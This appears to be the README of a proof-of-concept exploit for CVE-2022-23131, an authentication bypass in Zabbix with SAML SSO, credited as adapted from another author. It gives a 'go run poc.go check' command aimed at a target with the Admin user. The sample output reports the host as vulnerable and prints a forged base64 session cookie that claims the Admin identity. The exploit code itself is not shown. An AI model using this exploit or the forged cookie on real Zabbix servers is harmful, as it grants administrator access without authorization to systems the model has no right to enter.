Enviroment and Poc of CVE-2022-23131
You can create a Zabbix with SAML SSO follow the step in Zabbix Enviroment for CVE-2022-23131.
The Poc was modified from jweny
Usage:
go run poc.go check -t http://localhost:8080 -u Admin
[INFO] 2022/02/24 19:49 vul exist! target: http://localhost:8080, cookie: eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiYmYyMzAxMWU1YWMyOWE1MjFlN2E1ZDZjMTAwZDQ2NjAiLCJzaWduIjoiaytKblhjVjlhQmJRa3NJc21oMVRwVEhrMGFDSTJOYkM1VGNTU1doczQ3YVIrNmpWZ1BKOGw5cWZhZlRmcjA3VGVKalNZcW5kZWRPWEtleklmS0Fjb3c9PSJ9